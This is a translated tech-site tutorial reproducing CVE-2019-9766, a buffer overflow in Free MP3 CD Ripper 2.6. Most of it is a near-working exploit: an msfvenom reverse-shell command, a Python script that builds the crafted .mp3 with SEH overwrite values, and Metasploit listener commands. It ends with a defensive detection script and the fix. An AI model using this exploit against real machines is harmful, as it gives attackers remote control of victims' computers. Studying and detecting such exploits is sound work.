2025-01-18 Update From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
This article walks through reproducing the CVE-2019-9766 vulnerability in detail; interested readers may find it a useful reference.
CVE-2019-9766 is a buffer overflow vulnerability in Free MP3 CD Ripper that allows a remote attacker to execute arbitrary code by inducing a user to open a specially crafted .mp3 file during file conversion. Testing has shown that the vulnerability is reproducible on multiple Windows versions, including Windows 7 and Windows 10 (Free MP3 CD Ripper version 2.6 is required). Below we use Metasploit to reproduce CVE-2019-9766.
Environment preparation
Attacker machine: Kali (it is recommended to set the network adapter to bridged mode), IP 192.168.50.113
Target machine: Windows 10, IP 192.168.50.232
First, the target must have the vulnerable version, Free MP3 CD Ripper 2.6, installed; this is the key requirement. After installation the program looks like the figure below.
Payload generation and listener setup
On Kali, generate the shellcode with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.50.113 lport=2333 -f c --smallest
We use this shellcode in a script that generates the attack payload. Note that the script is written for Python 2.
#!/usr/bin/env python2
# Builds the crafted .mp3 file: filler up to the SEH record, the nSEH short
# jump, the SEH overwrite address, a NOP sled, the shellcode, and padding.
filler = b"A" * 4116              # filler to reach the SEH record
nseh = b"\xeb\x06\x90\x90"        # short jump (6 bytes) over the SEH record
seh = b"\x84\x20\xe4\x66"         # SEH overwrite address from the original script
nops = b"\x90" * 5                # NOP sled in front of the shellcode
# buf holds the shellcode produced by the msfvenom command above; the bytes are
# not reproduced here because they embed the lhost/lport chosen when generating.
buf = b""                         # paste the msfvenom output here as byte strings
pad = b"B" * (316 - len(nops) - len(buf))   # pad the region to a fixed size
payload = filler + nseh + seh + nops + buf + pad
try:
    f = open("TestFMCR.mp3", "wb")   # binary mode so no bytes are translated
    print("[+] Creating %s bytes mp3 file..." % len(payload))
    f.write(payload)
    f.close()
    print("[+] mp3 file created successfully!")
except IOError:
    print("File cannot be created!")
First copy the generated MP3 file to the target machine, then open msfconsole on the attacker machine, select the handler module and configure the listener (IP, port, payload):
msfconsole
use exploit/multi/handler
set lhost 192.168.50.113
set lport 2333
set payload windows/meterpreter/reverse_tcp
Then start listening:
exploit
Result
With the listener running, place the prepared MP3 file on the target machine and open the program. Click Convert and select the file; if the .mp3 file is not listed, the dialog probably shows only .wav files by default, so change the file-type filter at the bottom to all files.
Select the file and open it; the program starts reading the file for conversion.
Once it runs, the program may flash, stop responding, or report an error; after all, this is not a real MP3 file. That does not matter: on the listener side we can see that a session has come back.
It has to be said that the exploitation value of CVE-2019-9766 is relatively low: although the buffer overflow leads to remote code execution, it requires that the target has Free MP3 CD Ripper installed and that it is exactly version 2.6. The fix is correspondingly simple: uninstall the software or update it to a later version.
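As an added defender-side example, not part of the original article: a small Python triage check that flags a file submitted as .mp3 when it has no MP3 header at offset 0, contains a long run of identical filler bytes, or carries the nSEH short-jump marker (EB 06 90 90) used in the script above. Both sample inputs are constructed; the crafted sample uses a dummy SEH value and no shellcode.

```python
import re

# Constructed sample (not a real crafted file): mimics the layout the script
# above produces (4116 filler bytes, nSEH, dummy SEH, NOP sled, padding).
SAMPLE_CRAFTED = (b"A" * 4116 + b"\xeb\x06\x90\x90" + b"\x00\x00\x00\x00"
                  + b"\x90" * 5 + b"B" * 311)
# Constructed minimal legitimate-looking MP3: ID3v2 header then a frame sync.
SAMPLE_MP3 = b"ID3\x04\x00\x00\x00\x00\x00\x00" + b"\xff\xfb\x90\x00" + b"\x00" * 64


def looks_like_mp3(data):
    """True if the data starts with an ID3v2 tag or an MPEG audio frame sync."""
    if data[:3] == b"ID3":
        return True
    # MPEG frame sync: 11 set bits (0xFF followed by the top 3 bits of the next byte)
    return len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0


def longest_byte_run(data):
    """Length of the longest run of one repeated byte value."""
    best = 0
    for m in re.finditer(rb"(.)\1*", data, re.DOTALL):
        best = max(best, len(m.group(0)))
    return best


def triage(data, run_threshold=1024):
    """Return a list of findings for a file that claims to be an .mp3."""
    findings = []
    if not looks_like_mp3(data):
        findings.append("no ID3 tag or MPEG frame sync at offset 0")
    run = longest_byte_run(data)
    if run >= run_threshold:
        findings.append("filler run of %d identical bytes" % run)
    # jmp +6 padded with NOPs is the classic nSEH marker of SEH-overwrite files.
    if b"\xeb\x06\x90\x90" in data:
        findings.append("nSEH short-jump marker (EB 06 90 90) present")
    return findings
```

An empty result means none of the three heuristics fired; the run threshold can be tuned, since real audio rarely contains kilobyte-long runs of one byte outside of silence encoded as zeros.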
That concludes the CVE-2019-9766 reproduction. I hope the above is helpful and that you have learned something from it; if you found the article useful, please share it so more people can see it.